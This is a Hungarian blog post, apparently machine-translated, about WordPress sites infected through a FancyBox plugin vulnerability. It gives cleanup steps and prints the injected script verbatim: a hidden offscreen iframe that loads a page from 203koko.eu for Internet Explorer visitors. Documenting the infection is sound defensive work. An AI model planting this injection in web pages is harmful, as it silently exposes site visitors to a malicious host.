[Malware iframe 203koko] Webhely WordPress Fertőzött Malware

A hét elején számos honlapok és blogok WordPressfigyelmeztetéseket kapott rosszindulatú fertőzés keresztül Google Webmasters.

A probléma, amelyre Google Webmasters utalt, a jelenléte tőkehal / forgatókönyv iframe rosszindulatú program a forrás honlapok.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Úgy tűnik, hogy ez egy sebezhetőség a csatlakoztatvívmányok FancyBox számára WordPress ami egészen tegnapig (05.02.2015) nem frissült sokáig.
E probléma megoldása és fertőtlenítő vírusok oldalak ezzel a rosszindulatú programmal, viszonylag egyszerű.
1. Tiltsa le a FancyBox plugint.
2. Törölje az összes FancyBox plugin fájlt a kiszolgálóról (FTP-n keresztül)
3. Telepítse a bővítmény új verzióját (Fancybox 3.0.4)

FancyBox számára WordPress 3.0.4

- Átnevezte a 3.0.3-ban említett biztonsági probléma által érintett beállítást. Ennek meg kell akadályoznia a rosszindulatú kód megjelenését azokon a webhelyeken, ahol a beépülő modul található updated a rosszindulatú kód eltávolítása nélkül.

FancyBox számára WordPress 3.0.3

Javítva egy biztonsági kérdés.

Malware információ: 

TYPE: Iframe átirányítás
TARGET: WordPress fancybox
KÁRTÉKONY DOMAIN: 203koko.eu
KÁRTÉKONY URI: http://203koko.eu/hjnfh/ipframe2.php
ROSSZINDULATÚ RAW KÓDOK:
MALWARE ÍRT: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Távolítsa el a rosszindulatú programokat WordPress .

Alapítója és szerkesztője Stealth Settings, 2006-tól napjainkig. Operációs rendszerekben szerzett tapasztalat Linux (Különösen CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Hogyan » Google » [Malware iframe 203koko] Webhely WordPress Fertőzött Malware
Írj hozzászólást